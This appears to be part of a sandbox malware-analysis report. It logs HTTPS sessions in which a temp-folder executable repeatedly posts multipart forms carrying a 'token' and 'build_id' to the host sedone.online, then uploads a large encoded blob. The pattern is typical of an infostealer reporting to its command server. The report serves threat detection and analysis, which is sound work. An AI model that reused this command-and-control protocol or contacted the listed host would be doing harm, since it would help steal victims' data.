2024-12-16 10:05:15 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----168Q1DJEUA1N7QIE3E3O User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 1825 Connection: Keep-Alive Cache-Control: no-cache
2024-12-16 10:05:15 UTC	1825	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 31 36 38 51 31 44 4a 45 55 41 31 4e 37 51 49 45 33 45 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 63 30 31 38 38 32 63 38 32 36 33 39 39 37 35 31 36 66 64 34 62 36 33 36 33 62 38 38 61 0d 0a 2d 2d 2d 2d 2d 2d 31 36 38 51 31 44 4a 45 55 41 31 4e 37 51 49 45 33 45 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 31 36 38 51 31 44 4a 45 55 41 31 4e 37 51 49 45 33 45 33 4f 0d 0a 43 6f 6e 74 Data Ascii: ------168Q1DJEUA1N7QIE3E3OContent-Disposition: form-data; name="token"e62c01882c8263997516fd4b6363b88a------168Q1DJEUA1N7QIE3E3OContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------168Q1DJEUA1N7QIE3E3OCont
2024-12-16 10:05:16 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 10:05:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-16 10:05:16 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.5	50163	116.203.12.114	443	1084	C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:05:16 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FKXBA1N7QIEUAAA1NGVK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 1837 Connection: Keep-Alive Cache-Control: no-cache
2024-12-16 10:05:16 UTC	1837	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 4b 58 42 41 31 4e 37 51 49 45 55 41 41 41 31 4e 47 56 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 63 30 31 38 38 32 63 38 32 36 33 39 39 37 35 31 36 66 64 34 62 36 33 36 33 62 38 38 61 0d 0a 2d 2d 2d 2d 2d 2d 46 4b 58 42 41 31 4e 37 51 49 45 55 41 41 41 31 4e 47 56 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 46 4b 58 42 41 31 4e 37 51 49 45 55 41 41 41 31 4e 47 56 4b 0d 0a 43 6f 6e 74 Data Ascii: ------FKXBA1N7QIEUAAA1NGVKContent-Disposition: form-data; name="token"e62c01882c8263997516fd4b6363b88a------FKXBA1N7QIEUAAA1NGVKContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------FKXBA1N7QIEUAAA1NGVKCont
2024-12-16 10:05:17 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 10:05:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-16 10:05:17 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.5	50164	116.203.12.114	443	1084	C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:05:18 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----VS2DJEKF37QQQQ90R1DJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 1817 Connection: Keep-Alive Cache-Control: no-cache
2024-12-16 10:05:18 UTC	1817	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 56 53 32 44 4a 45 4b 46 33 37 51 51 51 51 39 30 52 31 44 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 63 30 31 38 38 32 63 38 32 36 33 39 39 37 35 31 36 66 64 34 62 36 33 36 33 62 38 38 61 0d 0a 2d 2d 2d 2d 2d 2d 56 53 32 44 4a 45 4b 46 33 37 51 51 51 51 39 30 52 31 44 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 56 53 32 44 4a 45 4b 46 33 37 51 51 51 51 39 30 52 31 44 4a 0d 0a 43 6f 6e 74 Data Ascii: ------VS2DJEKF37QQQQ90R1DJContent-Disposition: form-data; name="token"e62c01882c8263997516fd4b6363b88a------VS2DJEKF37QQQQ90R1DJContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------VS2DJEKF37QQQQ90R1DJCont
2024-12-16 10:05:19 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 10:05:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-16 10:05:19 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.5	50166	116.203.12.114	443	1084	C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:05:19 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----2VSJ5PH4EU3E379HDB1V User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 1817 Connection: Keep-Alive Cache-Control: no-cache
2024-12-16 10:05:19 UTC	1817	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 32 56 53 4a 35 50 48 34 45 55 33 45 33 37 39 48 44 42 31 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 63 30 31 38 38 32 63 38 32 36 33 39 39 37 35 31 36 66 64 34 62 36 33 36 33 62 38 38 61 0d 0a 2d 2d 2d 2d 2d 2d 32 56 53 4a 35 50 48 34 45 55 33 45 33 37 39 48 44 42 31 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 32 56 53 4a 35 50 48 34 45 55 33 45 33 37 39 48 44 42 31 56 0d 0a 43 6f 6e 74 Data Ascii: ------2VSJ5PH4EU3E379HDB1VContent-Disposition: form-data; name="token"e62c01882c8263997516fd4b6363b88a------2VSJ5PH4EU3E379HDB1VContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------2VSJ5PH4EU3E379HDB1VCont
2024-12-16 10:05:20 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 10:05:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-16 10:05:20 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.5	50167	116.203.12.114	443	1084	C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:05:21 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----XBA1VAI58YMYU379R1D2 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 453 Connection: Keep-Alive Cache-Control: no-cache
2024-12-16 10:05:21 UTC	453	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 58 42 41 31 56 41 49 35 38 59 4d 59 55 33 37 39 52 31 44 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 63 30 31 38 38 32 63 38 32 36 33 39 39 37 35 31 36 66 64 34 62 36 33 36 33 62 38 38 61 0d 0a 2d 2d 2d 2d 2d 2d 58 42 41 31 56 41 49 35 38 59 4d 59 55 33 37 39 52 31 44 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 58 42 41 31 56 41 49 35 38 59 4d 59 55 33 37 39 52 31 44 32 0d 0a 43 6f 6e 74 Data Ascii: ------XBA1VAI58YMYU379R1D2Content-Disposition: form-data; name="token"e62c01882c8263997516fd4b6363b88a------XBA1VAI58YMYU379R1D2Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------XBA1VAI58YMYU379R1D2Cont
2024-12-16 10:05:22 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 10:05:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-16 10:05:22 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.5	50169	116.203.12.114	443	1084	C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:05:24 UTC	328	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HVAI5F3EKF37QQQI5XLX User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 103029 Connection: Keep-Alive Cache-Control: no-cache
2024-12-16 10:05:24 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 56 41 49 35 46 33 45 4b 46 33 37 51 51 51 49 35 58 4c 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 63 30 31 38 38 32 63 38 32 36 33 39 39 37 35 31 36 66 64 34 62 36 33 36 33 62 38 38 61 0d 0a 2d 2d 2d 2d 2d 2d 48 56 41 49 35 46 33 45 4b 46 33 37 51 51 51 49 35 58 4c 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 48 56 41 49 35 46 33 45 4b 46 33 37 51 51 51 49 35 58 4c 58 0d 0a 43 6f 6e 74 Data Ascii: ------HVAI5F3EKF37QQQI5XLXContent-Disposition: form-data; name="token"e62c01882c8263997516fd4b6363b88a------HVAI5F3EKF37QQQI5XLXContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------HVAI5F3EKF37QQQI5XLXCont
2024-12-16 10:05:24 UTC	16355	OUT	Data Raw: 71 79 73 65 4c 4a 33 64 78 44 52 53 30 6c 4d 51 55 68 70 61 4b 42 69 55 55 55 55 41 46 4a 53 30 55 44 45 70 44 53 30 55 41 4a 51 61 57 6b 70 67 4a 52 53 30 55 44 45 70 4b 57 6b 6f 47 46 4a 53 30 55 41 4a 52 52 52 51 4d 53 69 6c 70 4b 59 43 47 69 6c 70 4b 41 45 6f 70 61 53 67 6f 4b 44 52 51 61 41 45 70 4b 57 69 67 59 6c 4a 53 30 55 41 4a 53 47 6c 6f 6f 47 4a 51 61 4b 4b 42 69 55 6c 4f 70 4d 55 41 68 4b 53 6e 59 70 44 51 4d 53 69 6c 70 4b 42 69 47 6b 70 31 49 52 51 41 6c 4a 53 30 55 44 47 30 55 74 49 61 42 68 53 55 74 4a 51 41 55 6c 4c 52 51 55 4a 53 55 74 4a 51 41 6c 4a 54 71 53 67 59 6c 4a 53 30 55 57 47 49 65 61 51 35 46 4c 33 6f 50 4e 41 78 74 4a 33 70 33 72 53 66 34 30 44 45 6f 4e 46 48 58 6a 72 53 47 49 52 7a 53 45 55 70 4e 49 54 7a 51 41 6d 50 72 51 Data Ascii: qyseLJ3dxDRS0lMQUhpaKBiUUUUAFJS0UDEpDS0UAJQaWkpgJRS0UDEpKWkoGFJS0UAJRRRQMSilpKYCGilpKAEopaSgoKDRQaAEpKWigYlJS0UAJSGlooGJQaKKBiUlOpMUAhKSnYpDQMSilpKBiGkp1IRQAlJS0UDG0UtIaBhSUtJQAUlLRQUJSUtJQAlJTqSgYlJS0UWGIeaQ5FL3oPNAxtJ3p3rSf40DEoNFHXjrSGIRzSEUpNITzQAmPrQ
2024-12-16 10:05:24 UTC	16355	OUT	Data Raw: 57 37 52 72 63 72 75 58 62 4a 38 77 2b 62 66 2b 38 35 39 68 57 4c 71 57 75 33 39 70 42 62 75 56 30 64 74 54 57 61 34 33 69 30 6a 74 35 6f 68 42 6c 51 6d 38 49 44 48 76 7a 76 2f 41 4e 6f 44 47 65 31 46 76 6f 73 32 6e 52 4b 4e 4f 75 2f 49 62 7a 49 70 57 4a 6a 56 73 76 47 32 35 47 35 42 35 42 2f 6d 52 30 4a 71 61 48 52 6f 49 72 4b 53 44 61 70 65 54 4a 5a 38 64 53 61 71 6c 67 63 53 35 72 32 6b 74 46 2b 4f 33 2f 42 46 55 7a 50 42 52 67 2f 5a 51 31 64 76 6c 61 2f 36 57 4e 47 36 75 6e 75 50 45 6d 73 52 65 56 42 46 46 61 33 4c 51 52 4a 44 43 73 59 43 67 6e 48 43 67 5a 50 75 65 61 71 33 6d 73 33 56 6c 6f 39 38 42 46 70 34 4d 56 31 61 51 78 79 76 5a 51 73 79 4a 4a 35 6d 37 4a 4b 45 6e 37 6f 35 4f 54 78 55 6c 76 44 4b 73 31 7a 63 58 45 6f 6c 75 4c 6d 51 79 79 79 62 Data Ascii: W7RrcruXbJ8w+bf+859hWLqWu39pBbuV0dtTWa43i0jt5ohBlQm8IDHvzv/ANoDGe1Fvos2nRKNOu/IbzIpWJjVsvG25G5B5B/mR0JqaHRoIrKSDapeTJZ8dSaqlgcS5r2ktF+O3/BFUzPBRg/ZQ1dvla/6WNG6unuPEmsReVBFFa3LQRJDCsYCgnHCgZPueaq3ms3Vlo98BFp4MV1aQxyvZQsyJJ5m7JKEn7o5OTxUlvDKs1zcXEoluLmQyyyb
2024-12-16 10:05:24 UTC	16355	OUT	Data Raw: 56 78 2b 42 67 61 57 4b 42 6e 30 6f 7a 52 6d 73 78 43 30 55 41 2b 31 4c 6d 67 42 4d 63 55 55 75 66 72 52 6b 55 67 43 67 55 74 46 46 77 45 37 55 75 4b 44 53 30 67 75 4a 69 69 6c 78 52 6a 33 6f 45 4a 69 6a 46 4b 4b 58 46 41 44 63 55 74 4c 69 6c 78 51 46 78 6f 48 38 71 58 46 4c 69 6a 46 4b 34 67 37 31 65 30 37 37 38 32 50 2b 65 44 2f 79 71 6d 42 56 37 54 76 39 62 4a 78 2f 79 78 66 2b 56 5a 56 76 67 59 4a 36 6e 41 79 65 39 52 47 70 58 78 6d 6f 6a 30 72 33 49 62 49 36 34 69 48 6d 6d 6e 70 53 39 61 51 31 5a 61 47 6d 6d 6e 31 2f 6c 54 6a 31 35 36 55 30 2f 67 61 47 55 68 75 41 54 54 53 61 55 6e 46 4e 50 4e 53 79 30 4a 6e 50 61 6b 50 4e 4b 54 39 61 61 54 55 4d 73 51 30 6e 34 30 70 36 39 61 62 6e 69 70 5a 51 68 48 58 72 53 64 2b 39 4c 32 70 4b 6b 59 48 50 76 54 54 Data Ascii: Vx+BgaWKBn0ozRmsxC0UA+1LmgBMcUUufrRkUgCgUtFFwE7UuKDS0guJiilxRj3oEJijFKKXFADcUtLilxQFxoH8qXFLijFK4g71e07782P+eD/yqmBV7Tv9bJx/yxf+VZVvgYJ6nAye9RGpXxmoj0r3IbI64iHmmnpS9aQ1ZaGmmn1/lTj156U0/gaGUhuATTSaUnFNPNSy0JnPakPNKT9aaTUMsQ0n40p69abnipZQhHXrSd+9L2pKkYHPvTT
2024-12-16 10:05:24 UTC	16355	OUT	Data Raw: 69 69 67 59 6c 42 70 61 54 46 4d 42 4b 4b 64 53 55 41 4a 52 53 30 55 57 47 4e 78 52 53 34 6f 77 4b 59 43 55 55 75 4b 58 46 41 44 61 4b 64 69 6a 46 4d 42 74 46 4f 78 52 69 67 42 74 46 4f 78 52 69 69 34 58 47 55 74 4f 78 52 74 4e 46 77 75 68 74 47 4b 6b 43 45 30 62 44 53 75 4b 36 45 69 48 37 31 66 72 57 37 71 41 2f 30 6f 2f 51 66 79 72 48 6a 54 45 69 35 49 48 4e 64 42 64 78 4c 50 4e 76 69 6b 52 31 49 48 52 68 6e 6f 4b 35 4b 30 72 54 51 4b 58 76 58 4d 33 46 4a 69 70 33 69 4b 66 65 69 6c 50 30 57 6f 6a 4b 71 2f 38 41 4c 4d 2f 6a 53 55 6b 39 6a 5a 53 76 73 4e 78 53 37 63 30 6e 32 6a 48 33 55 55 55 30 7a 79 48 2b 4c 48 30 71 74 53 72 4d 6b 38 74 6a 32 4e 4c 35 65 4f 75 42 56 63 75 78 36 73 54 2b 4e 4e 6f 73 78 38 72 4c 52 38 73 64 5a 42 54 53 38 49 37 6b 2f 51 Data Ascii: iigYlBpaTFMBKKdSUAJRS0UWGNxRS4owKYCUUuKXFADaKdijFMBtFOxRigBtFOxRii4XGUtOxRtNFwuhtGKkCE0bDSuK6EiH71frW7qA/0o/QfyrHjTEi5IHNdBdxLPNvikR1IHRhnoK5K0rTQKXvXM3FJip3iKfeilP0WojKq/8ALM/jSUk9jZSvsNxS7c0n2jH3UUU0zyH+LH0qtSrMk8tj2NL5eOuBVcux6sT+NNosx8rLR8sdZBTS8I7k/Q
2024-12-16 10:05:24 UTC	16355	OUT	Data Raw: 76 69 6a 46 41 6f 47 65 69 55 55 49 59 32 61 62 7a 4c 69 43 33 53 47 45 7a 79 53 54 46 74 6f 58 63 71 2f 77 41 4b 73 65 72 44 74 55 61 54 52 79 7a 32 63 55 56 78 62 79 69 37 6e 61 43 4b 52 57 59 4c 75 58 62 6b 6e 63 6f 49 41 44 41 39 4f 6c 63 73 73 52 54 6a 4c 6c 62 31 50 6d 59 59 53 76 4f 48 50 47 4e 30 53 67 6b 45 45 48 42 48 51 69 74 47 38 31 71 35 76 74 4c 6a 73 37 6a 35 6d 6a 6b 44 69 58 75 51 41 52 67 2f 6e 31 72 49 57 34 68 2b 63 7a 33 4e 76 62 4b 6c 79 31 73 7a 53 73 35 48 6d 4b 43 53 42 74 56 69 63 59 48 62 75 4b 6d 6d 43 52 58 46 76 43 6c 31 61 7a 65 64 62 2f 61 53 36 4f 36 72 46 46 2f 66 66 65 71 6c 51 65 33 47 54 78 6a 71 4d 38 39 53 70 68 4b 6b 6f 79 6d 30 32 74 55 2b 32 6c 39 2f 51 36 61 57 48 78 31 4f 4d 6f 77 54 53 6c 6f 31 33 31 74 74 36 Data Ascii: vijFAoGeiUUIY2abzLiC3SGEzySTFtoXcq/wAKserDtUaTRyz2cUVxbyi7naCKRWYLuXbkncoIADA9OlcssRTjLlb1PmYYSvOHPGN0SgkEEHBHQitG81q5vtLjs7j5mjkDiXuQARg/n1rIW4h+cz3NvbKly1szSs5HmKCSBtVicYHbuKmmCRXFvCl1azedb/aS6O6rFF/ffeqlQe3GTxjqM89SphKkoym02tU+2l9/Q6aWHx1OMowTSlo131tt6
2024-12-16 10:05:24 UTC	4899	OUT	Data Raw: 68 67 70 7a 38 73 69 2f 77 41 4c 6a 47 43 50 78 47 51 51 61 56 77 49 39 4b 30 61 39 31 6d 57 64 4c 4e 59 50 39 48 69 38 36 56 35 37 6d 4f 42 45 54 63 71 35 4c 53 4d 71 2f 65 64 52 31 37 31 71 54 65 43 4e 5a 74 33 43 54 79 61 50 45 35 52 58 43 76 72 56 6d 70 4b 73 6f 5a 54 7a 4c 30 49 49 49 50 63 45 47 72 2f 41 4d 4d 74 57 62 54 50 47 4e 76 62 49 31 31 45 2b 71 50 44 59 72 63 57 73 79 78 79 51 46 70 34 6d 33 6a 63 6a 42 68 38 6d 43 70 47 47 42 49 4e 53 65 4a 74 43 38 58 65 49 64 64 6b 31 4c 2f 68 45 76 45 53 62 34 6f 59 76 39 49 74 70 5a 70 47 38 75 4a 49 39 7a 76 73 58 63 78 32 5a 4a 77 4f 54 53 75 37 6a 74 6f 59 47 6f 65 47 74 52 30 33 54 7a 66 7a 47 78 6b 74 6c 6c 57 46 6e 74 64 51 67 75 4e 72 73 47 4b 67 69 4e 32 49 79 45 62 72 36 47 73 69 75 75 6e 30 Data Ascii: hgpz8si/wALjGCPxGQQaVwI9K0a91mWdLNYP9Hi86V57mOBETcq5LSMq/edR171qTeCNZt3CTyaPE5RXCvrVmpKsoZTzL0IIIPcEGr/AMMtWbTPGNvbI11E+qPDYrcWsyxyQFp4m3jcjBh8mCpGGBINSeJtC8XeIddk1L/hEvESb4oYv9ItpZpG8uJI9zvsXcx2ZJwOTSu7jtoYGoeGtR03TzfzGxktllWFntdQguNrsGKgiN2IyEbr6Gsiuun0
2024-12-16 10:05:26 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 10:05:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-16 10:05:26 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.5	50189	116.203.12.114	443	1084	C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:05:27 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HVKNYMGDTRQIEUAAI58Y User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-16 10:05:27 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 56 4b 4e 59 4d 47 44 54 52 51 49 45 55 41 41 49 35 38 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 63 30 31 38 38 32 63 38 32 36 33 39 39 37 35 31 36 66 64 34 62 36 33 36 33 62 38 38 61 0d 0a 2d 2d 2d 2d 2d 2d 48 56 4b 4e 59 4d 47 44 54 52 51 49 45 55 41 41 49 35 38 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 48 56 4b 4e 59 4d 47 44 54 52 51 49 45 55 41 41 49 35 38 59 0d 0a 43 6f 6e 74 Data Ascii: ------HVKNYMGDTRQIEUAAI58YContent-Disposition: form-data; name="token"e62c01882c8263997516fd4b6363b88a------HVKNYMGDTRQIEUAAI58YContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------HVKNYMGDTRQIEUAAI58YCont
2024-12-16 10:05:28 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 10:05:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-16 10:05:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.5	50202	116.203.12.114	443	1084	C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:05:29 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----LN7YMY5FK6F3E37900RI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-16 10:05:29 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4c 4e 37 59 4d 59 35 46 4b 36 46 33 45 33 37 39 30 30 52 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 63 30 31 38 38 32 63 38 32 36 33 39 39 37 35 31 36 66 64 34 62 36 33 36 33 62 38 38 61 0d 0a 2d 2d 2d 2d 2d 2d 4c 4e 37 59 4d 59 35 46 4b 36 46 33 45 33 37 39 30 30 52 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4c 4e 37 59 4d 59 35 46 4b 36 46 33 45 33 37 39 30 30 52 49 0d 0a 43 6f 6e 74 Data Ascii: ------LN7YMY5FK6F3E37900RIContent-Disposition: form-data; name="token"e62c01882c8263997516fd4b6363b88a------LN7YMY5FK6F3E37900RIContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------LN7YMY5FK6F3E37900RICont
